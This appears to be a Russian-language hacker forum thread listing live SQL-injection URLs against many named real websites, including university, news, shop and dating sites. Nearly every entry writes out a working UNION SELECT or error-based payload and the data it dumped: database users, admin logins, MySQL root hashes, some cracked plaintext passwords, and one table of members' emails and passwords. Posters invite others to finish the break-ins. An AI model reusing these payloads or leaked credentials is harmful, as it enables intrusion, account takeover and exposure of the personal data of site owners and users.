igiochideigrandi.ithttp://www.igiochideigrandi.it/articolo.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11/* 5.0.24a-standard:igdg:igdg@fiona

Из интересных таблиц только - clienti и email

evolutionschool.comhttp://www.evolutionschool.com/old/libera_scuola/index.php?sup=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),database(),user()),12,13/* 4.0.18-standard:evolutionsc29158:evolutionsc29158@web-a1.seeweb

Админ:http://www.evolutionschool.com/old/libera_scuola/index.php?sup=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,user_name,password),12,13+from+auth+limit+0,1/* [логин : пасс] :admin : 99alanma99 Админку не нашёл, кто найдёт - отпишитесь [+].

danielesegre.ithttp://www.danielesegre.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9/* 5.0.45-community-log:Sql121959_1:Sql121959@62.149.140.82

Админ:http://www.danielesegre.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6,7,8,9+from+utenti+limit+0,1/*
[логин : МД5(пасс)] :daniele : f156e7995d521f30e6c59a3d6c75e1e5

lapa.princeton.edu

http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_ws(0x3a,version(),user(),database()) ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39+from+mysql.user+--+
4.1.12:lapa@localhost:LAPA
http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_ws(0x3a,user,password),19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+ from+mysql.user+--+
root:*74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

http://www.buliro.it/forumgiovani/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
http://www.floornature.com/articoli/articolo.php?id=-1'&sez=6&lang=en
http://www.kousmine.it/articolo.php?id=-1+union+select+1,2,user(),4,version(),6,7,8,9,10,1 1/*
kousmine@localhost
4.1.20
http://www.storialibera.it/il_sabato/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тут ничего не вышло.
http://www.polonews.info/articolo.php?id=-1+union+select+1,2,user(),database(),version(),6/*
LB5706_polonews@81.88.49.16
http://www.ocsabaoth.com/articolo.php?id=-1+union+select+user(),2,3,database(),version(),6,7 ,8,9/*
minister@win3.infinology.com
4.1.22-standard-log
Кто дораскрутит?
http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables/*
тут список всех таблиц.
http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.COLUMNS/*

Италия

didaweb.nethttp://www.didaweb.net/liste/leggi.php?a=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12/*&lista=001 4.0.27-standard-log:Sql40985_1:Sql40985@62.149.140.21

comunemio.ithttp://www.comunemio.it/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3/* 4.0.18-nt:dg2:edicolante@localhost

ildiavolo.comhttp://www.ildiavolo.com/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12/*&mode=articolo 5.0.32-Dotdeb_1.dotdeb.1-log:ildiavolosql1:ildiavolosql1@localhost

Интересных таблиц не нашёл.

http://anekdot.meta.ua

http://anekdot.meta.ua/index.php?theme=-53+union+select+1/*

anekdot@192.168.11.27
4.0.26-max-log
anekdot

http://www.uazmadi.ru

http://www.uazmadi.ru/news.php?news_id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+2,1/*

edu
http://duckhenge.uoregon.edu/io/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
io@localhost:5.0.32-Debian_7etch1-log:io

wandp.american.edu
http://wandp.american.edu/pages.php?ID=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71),3,4+--+
4.1.13a-nt
http://wandp.american.edu/pages.php?ID=-1+union+select+1,2,3,4+from+mysql.user+--+
user
password

root:*ADDF07FCC8E37371B887F38314C77A2FA4BC71CE
kirill:*647EE0BF48ED4F9607F02931A1F64099C4883091
pmauser:*D9826E8D7609B8DF2B01003A4149F81513FEBF22

Так, хорош раздавать мои edu'шки =(

http://www.fhmbuurmeisje.nl/profile.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17/*
ttg-db@localhost:4.1.20-log:ttg-fhm
pr=3



edu
http://studyabroad.arizona.edu/display_program.php?id=76+group+by+2/*

http://events.internet2.edu/speakers/speakers.php?go=people&id=1+group+by+3/*

.edu
У всех версия mysql = 5
http://www.bethlehem.edu/news_events/bu_in_news/list.php?id=-67+union+select+1,concat(alpha,0x3a,name,0x3a,emai l,0x3a,pos,0x3a,dep,0x3a,type),3,4+from+staff/*
http://www.pharmchem.ku.edu/people-faculty-info.php?ID=-4+union+select+1,aes_decrypt(aes_encrypt(version() ,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*

http://iteco.ru/search.php?q=1'+union+select+1,user.usrname+from+m ysql.user/*
User max'@'localhost

experts.uchicago.edu
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42+--+
4.0.24-standard
http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,passwor d),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42+from+mysql.user+limit+0,1+--+
root:0bd914e54597ba5d

Duke News
http://dukemednews.duke.edu

Сама скуля:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0


Выводим столбцы:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/*

//будут в самом низу справа

Выводим имя_пользователя:версию_бд: имя_бд:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,conca t_ws(0x3a,user(),version(),database()),4/*

web@vml-news.duhs.duke.edu:4.0.18:news

File_priv выкл:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,load_ file(0x2F6574632F706173737764),4/*


Есть доступ в mysql.user

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,conca t_ws(0x3a,user,password),4+from+mysql.user/*


Специально для вас расшифровал ;)

mnogosearch:0547d8b07eba42f3:gh34mx92
root:623460e26f081bbc:mt01du01
web:761b2fc844890384:fr56nv29


Соседствующие сайты:

1) news.mc.duke.edu
2) dukemednews.duke.edu
3) dukemednews.com
4) dukemednews.org


админка:

http://dukemednews.duke.edu/admin


Пока все :)

dialog.kz

http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14+from+u sers/*'

4.1.22-standard::dialog_hl@localhost::dialog_hl

http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*'

коннект хреновый, подберите поля и юзайте =)

dialog.kz

http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+ from+users/*
коннект хреновый, подберите поля и юзайте =)

http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(char(58),userna me,userpass),6,7,8,9,10,11,12,13,14+from+users/*
admin:edf95addf04ca869faa73677ae66f5ea



http://www.needaplacetogo.co.uk/fashion.asp?id=1+or+1=(SELECT+TOP+1+cast(M_USERNAM E+as+nvarchar)%2B%27%3A%27%2Bcast(M_PASSWORD+as+nv archar)+from+FORUM_MEMBERS+WHERE+MEMBER_ID=1)--

Италия

Powered By Centro Studi Airone

Уязвимость в скрипте leggi.php

Примеры:http://www.deltard.com/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base( ),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*& 4.1.22-standard-log:Sql84077_1:Sql84077@62.149.140.88http://www.onecapital.it/homepage/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/* 4.0.27-standard-log:Sql20147_3:Sql20147@62.149.140.29http://www.anguillarainforma.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/* 4.0.27-standard-log:Sql24700_1:Sql24700@62.149.140.36http://www.101vetrine.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data bas e(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9/* 4.0.27-standard-log:Sql72154_1:Sql72154@62.149.140.28

http://www.vedo.ru

http://www.vedo.ru/guest/guest.php?id=-1+union+select+1,2,username,user_password,5,6,7,8+ from+phpbb_users/*
admin:061ed190e137ee416c25b4e8658fd3a3

http://www.redbullreaccion.com/
http://www.redbullreaccion.com/news_detail.php?lang=en&id=-1+union+select+1,2,3,user(),version(),6,database() ,8,9,10/*

akce.cvut.cz

https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,1,1,1,1,1,1,1,1,1/*

4.1.11-Debian_4sarge7-log/akce/akce@localhost


https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(userna me+as+binary),cast(password+as+binary)),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1+f rom+users/*

логин/хеш
admin/*474ECE06942A2A91CBB3CB29D6C6F6A97C449630 прикольный хеш ))

---------------------------------------------------------------------

http://www.balka.kharkov.ua/select_ss.php?tp=1&ss=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

4.0.27/portal/adminkh@localhost

--------------------------------------------------------------------
http://www.megaspravka.ru/news_show.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7/*

4.1.22/wwwmegaspravkaru/megaspra@localhost

Италия

gsteam.bizhttp://www.gsteam.biz/video.php?media_ID=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4/* 4.1.11-Debian_4sarge7-log:gsteam_biz:jbag0007@localhost

portalstiri.comhttp://www.portalstiri.com/stiri.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/* 4.1.22-standard : pstiri_pstiridb : pstiri@localhost

emcquadro.com - ПОЗОР!!!http://www.emcquadro.com/php.php?id_arg=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/* 4.1.22-standard-log:emcquadr_emcquadr13860:emcquadr_interne@localh ost

inputdata.nethttp://www.inputdata.net/concordia/sezione.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6/* 4.0.27-standard-log:Sql19754_3:Sql19754@62.149.140.114

infomedia2000.ithttp://www.infomedia2000.it/prometeo/sezione.php?ID=1%20AND%20ascii(lower(substring(ver sion(),1,1)))=51/* version() : 3.23.58

viaggiavventurenelmondo.ithttp://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9/* 5.0.37-log:cdocanm:anm_sites@172.17.0.76

201 таблица:http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+table_name,2,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+200,1/* Админ [ логин : пасс ] :simz : stealthx77cdd

clubsss.com

http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1/*

4.1.8-standard/conus_clubsss/conus_clubsss@localhost


http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,password,3,4,5,6,7,8,9,1,1,1,1,1, 1,1,1,1,1+from+users/*

хеш колумн с логином не подобрал (

-----------------------------------------------------------------------------
myworld.md


http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x2F,version(),database(),user()),16,17,18 ,19,1,1,1,1,1,1,1,1,1/*

5.0.27/13195/13195@localhost


http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x2F,nic,mail_all,mail_secret,upass),16,17 ,18,19,1,1,1,1,1,1,1,1,1+from+user+limit+13,1/*

логин/общее мыло/секретное мыло/пароль не хеш.
sestri4ka/starka777@rambler.ru/kaneva_t@mail.ru/sanika :)

----------------------------------------------------------------------------
4lover.de


http://4lover.de/view.php?l=&id=-1'+union+select+1,2,concat_ws(0x2F,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1/*

5.0.45/DB179434/U179434@bravd.store

Есть доступ к information_schema

http://www.afdspn.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,0x3a,user(),0x3a,d atabase(),0x3a,version(),0x3a,0x3a)/*

http://www.puntoinformatico.it/download/file.asp?file_id=1+or+1=(SELECT+TOP+1+cast(Nicknam e+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvar char)+from+Utenti+where+ID_Prov=1)--

ENFIX, http://forum.antichat.ru/showpost.php?p=515305&postcount=3904

edu


http://www.choices.edu/resources/detail.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26/*
4.1.14-log:choices@charlie.services.brown.edu:Choices

http://www.emz-hanauer.de/public_main_modul.php?page_id=-1+union+select+1,user.usrname+from+mysql.user/*
Access denied for user 'db159514_2'@'127.0.0.2' to database 'mysql'

PR:5

http://www.mgnsw.org.au/museums_and_galleries.php?id=-16+union+select+1,2,3,4,5,6/*
mgnsw@localhost:4.1.20:mgnsw


PR:5

http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(char(58),v ersion(),user(),database())+using%20latin1),5,6,7, 8,9,10,11/*
winston@localhost:4.1.11-Debian_4sarge7:churchilltrust



PR:5

http://www.wormweb.nl/agenda.php?id=-1+union+select+aes_decrypt(aes_encrypt(user,0x71), 0x71)+from+users/*
wormweb@localhost:4.1.12-Debian_0.dotdeb.0-log:wormweb01

spblove.ru

http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,cast(version()+as+ binary),cast(database()+as+binary),cast(user()+as+ binary))/*

4.1.11-Debian_4sarge2-log/spblove8_main/spblove8_main@85.249.135.4


http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,login,password,icq )+from+ankets+limit+1300,1/*

логин/хеш/уин
-----------------------------------------------------------------------------

http://www.happywedding.ru/ladies_details.php?recordID=-1+UNION+SELECT+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1/*

4.1.22-lk-log/hapwru_lady/hapwru_lady@localhost
--------------------------------------------------------------------------

http://www.prosex.com.ua/news/show.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22/prosex/prosex@localhost
--------------------------------------------------------------------------
http://news.13rus.ru/?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22-standard/vitaliy_13rus/vitaliy_13rus@localhost
--------------------------------------------------------------------------
ecoby.info

http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14/*

4.1.21-standard-log/ecobyin_iac/ecobyin_User@localhost


http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,ulogin,upa ss,umail),7,8,9,10,11,12,13,14+from+users/*

логин/хеш/мейл

http://www.privacyconference2006.co.uk/

http://www.privacyconference2006.co.uk/index.asp?PageID=-1+union+select+version(),2/*

Не смог подобрать таблицы...

PR:3

http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),user() ,version(),database()),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23/*
sr0291893@81.31.99.13:5.0.45-log:sr0291893

http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23+from+informati on_schema.tables+limit+24,1/*
shiznit_users

http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,column_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+from+informat ion_schema.columns+where+table_name='shiznit_users '+limit+1,1/*
nickname : email : password : id

http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),nickna me,email,password,id),6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23+from+shiznit_users/*
Bob:andy@mrhunt.co.uk:shiznitgod:1
andy:andy:12345:8
Pandaemonium:richardjamesbacon@btinternet.co.uk:pr eacher:10
thefuckestuppest:moshpit@grungefans.co.uk:wolf359: 11
blamfish:bianconeri@gmail.com:kamikaze:12
monkey_man:lukewhiston@hotmail.com:monkeyman:13
Geffdof:jeffbeynon@hotmail.com:kennym:14
...


PR:4

http://www.lunarenergy.co.uk/newsDetail.php?id=-12+union+select+1,2,3,4,5,convert(concat_ws(char(5 8),version(),user(),database())using%20latin1),7/*
4.1.12-log:steve@64.57.64.164:sca

http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8 ,9,10,11/*&item=galleries

http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat( USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a ,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries

Admin
login: BG
password (hash): 7fd6766a2eef757f37d022422fe8aff5

http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39+from+mysql.user/*

MySql5 hash
root *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3

http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarc har)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from +users+where+USER_ID=2)--

SHOP.
www.russki-shop.de
http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24+from+users+--+
4.1.10a-standard-log

столбец пароля
http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(pwd,0 x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24+from+users+--+
123
Подбирайте user' а ;)

Ещё один бажный молдавский магазин :)
pacnet.md
_http://www.pacnet.md/index.php?page=catalogue&cat_id=4&type_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
5.0.44-log и этим всё сказано :)

PR:4
http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58 ),user(),version(),database()),11,12,13,14,15,16/*
ipoteka_ipoteka@sr.dualg.com:4.1.19-standard-log:ipoteka_ipoteka

PR:4
http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(char(58),user(),version() ,database())/*
coruptie@localhost:4.1.21:coruptie_rabota

PR:3
http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),user(),versio n(),database()),3/*
6847@localhost:5.0.27:6847

http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,table_name,3+from+information_sc hema.tables+limit+1,1/*
rgb_members

http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),name,password ),3+from+rgb_members/*
OzzZZ:6055322b3c1cc50cef132211ca57aa75

Аргументы и Факты (Молдова)

PR:3

http://www.aif.md/index.php?id=-240+union+select+1,2,concat_ws(char(58),user(),ver sion(),database()),4,5,6,7,8/*
aif@localhost:4.1.14:aif

Италия

consunigo.ithttp://www.consunigo.it/news_dettaglio.php?idn=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ve rsion(),database(),user()),11,12,13,14,15,16/* 4.0.18-standard:consunigo:root@localhost

cai.mo.ithttp://www.cai.mo.it/soggiorno.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20/* 4.0.27-standard-log:Sql58426_1:Sql58426@62.149.140.27

В табе user нашёл поля id_user,user и email
Поле с паролем не нашёл :mad:

-------------------------------------------------------------------

Powered By Giaretta Immobiliare a Venezia

Уязвимость в скрипте sezione.php.

Примеры:http://www.giaretta.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/* http://www.cadeimiracoli.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/*http://www.choosevenice.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/*5.0.27:giaretta:dbuser@localhost

Сайт охотников и рыболовов.
http://www.ohota-ribalka.com.ua/sthunt_1.htm?id=-14+UNION+SELECT+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30+from+phpbb_users/*

+ есть открытая админка(без ввода пароля)
+ есть доступ к phpmyadmin
(ссылки запостил в разделе Админки)

Тур Агенство Велес-тур
http://www.veles-tour.ru/animals.php?animal=-10+union+select+1,2,user()/*
4.0.27-log
velestour
velestour@zvm5.host.ru

Италия

recensito.nethttp://www.recensito.net/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())/* 4.1.22-standard-log:Sql81530_4:Sql81530@62.149.130.119

centroeinaudi.ithttp://www.centroeinaudi.it/web/dinamico/sezione.php?id=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_en crypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_e ncrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes _encrypt(user(),0x71),0x71)),7,8,9,10/* 4.1.15-Debian_1ubuntu5-log:centroeinaudi:centroeinaudi@localhost

cogepiemonte.ithttp://www.cogepiemonte.it/news.php?f=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())/* 4.0.26-debug:cogepiemonte:cogepiemonte@localhost

нашёл лишь табу news

editoriaragazzi.comhttp://www.editoriaragazzi.com/sezione.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11/* 5.0.45-community-log:Sql137750_5:Sql137750@62.149.140.190

PR:4
http://www.inmerc.nl/product.php?id=32&cid=&artikelno=-5422+union+select+1,2,3,4,5,concat_ws(char(58),use r(),version(),database()),7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28/*
inmerc@localhost:5.0.37:inmerc

http://www.carvip.ru/autocatalog/?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*

5.0.41/carvip_new/carvip_new@localhost

------------------------------------------------------------------------------

http://www.cinema.variety.ru/actors.php?cid=2&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13/*

4.0.27-standard-log/variety_dvd/variety_dvd@localhost

------------------------------------------------------------------------------

http://stroyka.yandoo.ru/?sub=board&act=full&id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14/*

4.1.22/yandoo/yandoo@localhost

------------------------------------------------------------------------------

http://specserver.com/rus/notice.asp?groupID=-1+or+1=@@version

Microsoft SQL Server 2005 - 9.00.3159.00 (X64) Mar 23 2007 20:11:35 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+system_user)-- specserver-2

http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+db_name())-- specserver-2

http://culinary.org.ua/index.php?act=cat&id=-7+UNION+SELECT+1,2,3,4,version()/*
http://referat.findplace.ru/?id=-600+union+select+1/*

sportspb.ru

http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,cast(version()+as+bi nary),cast(database()+as+binary),cast(user()+as+bi nary))/*

4.1.7-log/newsportspb/newsport@localhost


http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,login,pass,email)+fr om+user+limit+0,1/*

логин/хеш/мейл
jtsport/f4f068e71e0d87bf0ad51e6214ab84e9/jt@sportspb.ru

-----------------------------------------------------------------------------
http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2
(Build 3790: Service Pack 2)

http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+system_user) kdoru

http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+db_name()) kdoru

http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+top+1+table_name+from+information_s chema.tables+where+table_name+not+in+('tblGuestNam e','tblSmut','ARTICLES','BANNERS','CAT_GOODS','CAT _TOPIC','CONFIG_VAR','dtproperties','kdo_ddu_arend a','kdo_ddu_arenda_snimu')) и тд.

PR:5
http://www.neurope.eu/view_news.php?id=-77501+union+select+1,concat_ws(char(58),user(),ver sion(),database()),3,4,5,6,7,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1/*
neweuro_kostas@localhost:4.1.22-standard:neweuro_corporate


PR:3
http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(char(58),user (),version(),database())/*
itbgeu_itbgeu@localhost:5.0.45:itbgeu_itbg

http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,table_name+from+informa tion_schema.tables/*
Выводится очень удобно )

admin
users
email
ip
forum_auth_access
forum_users
ibp_members
ibp_moderators
moderator
...

http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,column_name+from+inform ation_schema.columns/*

id
name
email
ip_address
username
user_password
user_email
user_icq
user
ip
...

Лень ковырятся (


PR:3
http://www.mypoolpal.eu/kiallitas/kiallitas.php?id=-1+union+select+1,2,concat_ws(char(58),user(),versi on(),database())/*
mypoolpal@localhost:4.1.21-standard:mypoolpal



http://www.mortarinvestments.eu/vehicle.php?id=-119+union+select+1,2,3,4,concat_ws(char(58),user() ,version(),database()),6,7,8/*
zbozi.mortarinvestments.eu@193.86.238.53:5.0.44-log:zbozi_mortarinvestments_eu

http://vital.com/job_details.php?job_listing_id=http://www.google.fr/webhp%3f<balisexss>%22%27

DFA-link - Боян -------удалено--------

Washington City Paper
http://www.washingtoncitypaper.com/display.php?id=34079-1 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52+--+

http://www.abt.org/ - American Ballet Theatre - Балет Пиндосов.

http://www.abt.org/insideabt/news_display.asp?News_ID=1+or+1=(SELECT+TOP+1+cast (C_Username+as+nvarchar)%2B%27%3A%27%2Bcast(C_Pass word+as+nvarchar)+from+CMS_USER+WHERE+CMS_USER_ID= 2)--

http://www.gettysburg.travel Первый раз вижу сайт .travel...

http://www.gettysburg.travel/media/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast( user_id+as+nvarchar)%2B%27%3A%27%2Bcast(password+a s+nvarchar)+from+tbl_user)--

http://www.kenandogulu.com.tr/fun/detay.asp?id=0+union+select+0,1,2+from+

помогите подобрать сайт певца

fantasy-earth.ru

http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8/*

5.0.41/fe_site/fe_site@localhost



